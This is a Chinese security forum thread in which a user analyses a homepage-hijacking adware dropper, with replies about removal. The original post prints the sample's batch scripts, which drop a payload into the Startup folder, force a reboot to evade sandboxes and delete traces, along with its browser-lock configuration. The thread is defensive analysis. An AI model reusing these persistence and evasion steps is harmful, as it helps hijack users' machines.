吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 13793|回复: 15
收起左侧

[PC样本分析] 【小白求教】强锁主页加驱流氓行为分析

  [复制链接]
翼风Fly 发表于 2015-10-13 10:42
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 翼风Fly 于 2015-10-13 18:51 编辑

鄙人小白,OD代码不太懂,有些问题想请教一下论坛里各位大大~如果能行的话我挺想试试OD分析的。。。不会。。。
样本位于:http://bbs.kafan.cn/thread-1856719-1-1.html
为增强可读性,仅选取一部分,完整分析请见27楼:http://bbs.kafan.cn/forum.php?mod=redirect&goto=findpost&ptid=1856719&pid=36051004


内容解析

接下来开始人工分析,菜菜一枚,各位轻拍~

下载后样本的直接分析
你要的东西.exe


OD里简单看了一下,这货就是个启动器,调用了几个系统文件,没看到什么特殊的地方(当然,看的比较草,水平也不够)

小白想问一下:
这东西用来干啥的?OD里发现调用了一下系统文件,但是不懂是怎么回事,求指点~


再看看里面批处理吧(我写了点注释)
[Shell] 纯文本查看 复制代码
::获取 当前用户的 运行 文件夹
for /f "skip=1 tokens=2*" %%a in ('reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Startup') do set qd=%%b 
set qd=%qd:~0,-1%
::解压文件
mm.exe x -y -p  mm.rar ^"%qd%\^"
::关机重启
Shutdown.exe -r -f -t 0


mm.exe其实就是WinRAR 5.21的命令版本,压缩包里一个是LMIns.exe(病毒主体),一个是2345.url (链接到 http://www.2345.com/?kisder)
RAR参数:
x             以完整路径提取文件
y             对所有询问假定选择“是”
p[password]   设置密码


RAR将内容解压到启动文件夹中
密码是一个空格 ,而且竟然还TMD竟然是不常见的全角空格“ ”,对于不熟悉RAR命令行的人来说容易被迷惑;
真仔细。。。醉了。。。

竟然想到了关机啊这个比较绕的办法。。。。。不关机怎么过你的在线/沙箱?
这样的样本杀软能扫到就怪了,病毒被加密了,其他的都是白。


病毒主体:LMIns.exe
PEiD检测:Microsoft Visual Studio .NET 2005 -- 2008 -> Microsoft Corporation [Overlay] *
连壳都不加。原来这是个压缩包,释放5个文件。



(原文件已经由卡饭该帖的28楼提供下载)
先上在线行为:
【文件B超】https://b-chao.com/index.php/Ind ... 55106FDA7B8ADB85B2/
【哈勃】http://habo.qq.com/file/showdetail?pk=ADwGZ11tB2EIOA==
【火眼】我等的花都谢了。。。 报告还没生出来,先贴坑:http://fireeye.ijinshan.com/analyse.html?md5=e4ec639c04cb743ce6a343d27f199a8d
【VirusScan】昨天有人扫了,3个报毒;现在,还是仨;跟进厂商们的速度不给力?
http://www.virscan.org/scan/72208c7a2a96fb3fa168579d3b6077ef

【VirusTotal】还是这里的厂商更新给力(检出率 10 / 56 ):https://www.virustotal.com/en/file/20b01ba54c3ca10709e203eeac5449f65c307a327132786ef5c619cc3736c9d3/analysis/1444661993/


直接释放的文件如下:
batfile~.bat
这文件负责运行hlsys32.exe后删除痕迹。
[Shell] 纯文本查看 复制代码
"C:\DOCUME~1\【用户名】\LOCALS~1\Temp\lmtp~\hlsys32.exe" /ins
:again 
del "C:\DOCUME~1\【用户名】\LOCALS~1\Temp\lmtp~\hlsys32.exe" /Q  
if exist "C:\DOCUME~1\【用户名】\LOCALS~1\Temp\lmtp~\hlsys32.exe" goto again 
del C:\DOCUME~1\【用户名】\LOCALS~1\Temp\lmtp~\*.*  /Q  
del %0


hlsys32.exe  (需要UAC权限)(求指点)
LaoMa Software ——老马软件?挺形象,哈哈~这东西用来负责下面的文件运行。也就是说,如果这货起不来,下面的都作废。OD简单看了一下,各种系统调用。不过为啥颠来倒去就那几个文件。。。小白不懂。。。

hlsys64.exe
又是LaoMa Software,用来负责64位系统

lksys.ini
一生锁页。。。这个名字带感!undefined各种浏览器不惧,管他是不是XXX安全浏览器~
[Config]
title=一生锁页
browsers_referer=chrome.exe*ucbrowser.exe*iexplore.exe*firefox.exe*360chrome.exe*360se.exe*liebao.exe*maxthon.exe*qqbrowser.exe*baidubrowser.exe*sogouexplorer.exe*opera.exe*f1browser.exe*2345Explorer.exe*2345chrome.exe*Opera\launcher.exe
url=http://www.2345.com/?kisder
param_deny=
param_reg_deny=
pmode=0
browsers=
saveurl=0
netcfgurl=
notclear=
pmode1=0
param_deny1=
param_reg_deny1=
lockmode=0
id=0
restart=0
secsnotlock=0


hlsys.dat
没仔细看,应该是个驱动



再往下我就不分析了。。。。


===============    启示    ===============


  • 杀毒软件一定不能作死关掉,UAC最好开着,这样的小流氓用杀软扫一下就能搞定;
  • 如果这个毒一上来就用OD看,可能会很累,多次释放文件。沙箱竟然可以关机
    所以还是虚拟机跑一边比较省事。。。。




最新发现,前方高能~~~

作者主页:http://hl.laolaoma.com/

  我都不知道该说什么好。。。

详情见:http://bbs.kafan.cn/forum.php?mod=redirect&goto=findpost&ptid=1856719&pid=36057418

免费评分

参与人数 2热心值 +2 收起 理由
qazwsxlty + 1 鼓励转贴优秀软件安全工具和文档!
Hmily + 1 鼓励转贴优秀软件安全工具和文档!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

qazwsxlty 发表于 2016-5-15 08:50
本帖最后由 qazwsxlty 于 2016-5-15 08:55 编辑

昨天一个朋友也碰见了这个,发过来让我分析,完全就是同一个东西。UAC弹出来的时候他选了是...
我提供给他的解决方法:删除启动文件夹下的2345.html和LMIns.exe。然后打开我提取出来的LMIns释放出来的四个文件中相应(32位点32,64位点64)的EXE,然后卸载。
然后他告诉我2345.html删不了,那就用工具删;然后我发的文件中exe打开之后不能点卸载(我怀疑是不是他64位开了32的),我当时让他点安装,然后点卸载(不卸载也行,我把配置文件里的锁定浏览器改成空了,不锁定任何浏览器)
最后传上我发给他的文件压缩包。文件超过1MB了, LMIns.part1.rar (900 KB, 下载次数: 14)
LMIns.part2.rar (539.25 KB, 下载次数: 13)



 楼主| 翼风Fly 发表于 2015-10-13 11:47
本帖最后由 翼风Fly 于 2015-10-13 11:50 编辑
201411112020 发表于 2015-10-13 11:01
我擦,看不懂的纯大白路过。 只想知道万一中这个病毒了,怎么去除他,才能挽救自己的电脑。

杀毒软件一定不能作死关掉,UAC最好开着,这样的小流氓用杀软扫一下就能搞定;见我原帖后面的360双击测试:
http://bbs.kafan.cn/forum.php?mod=redirect&goto=findpost&ptid=1856719&pid=36051004
201411112020 发表于 2015-10-13 11:01
我擦,看不懂的纯大白路过。 只想知道万一中这个病毒了,怎么去除他,才能挽救自己的电脑。
14771063 发表于 2015-10-13 11:24
多谢,学习了。
丶伊扬 发表于 2015-10-13 12:10
好吧,我都看不懂
送信员 发表于 2015-10-13 13:37
火眼不能用了。等也等不出来了
 楼主| 翼风Fly 发表于 2015-10-13 18:46
送信员 发表于 2015-10-13 13:37
火眼不能用了。等也等不出来了

火眼团队主要做安卓行为分析了,PC端没人维护
得等到他们把移动端完善后才会回来维护PC端分析
送信员 发表于 2015-10-14 11:40
翼风Fly 发表于 2015-10-13 18:46
火眼团队主要做安卓行为分析了,PC端没人维护
得等到他们把移动端完善后才会回来维护PC端分析

我记得很长时间没法用了,现在哈勃后来者居上了
 楼主| 翼风Fly 发表于 2015-10-14 13:17
送信员 发表于 2015-10-14 11:40
我记得很长时间没法用了,现在哈勃后来者居上了

哈勃和B超都很不错,目前火眼确实没什么优势 o( ╯□╰ )o
生如上善若水 发表于 2015-11-20 00:04
涨姿势了
谢谢分享
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 12:48

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表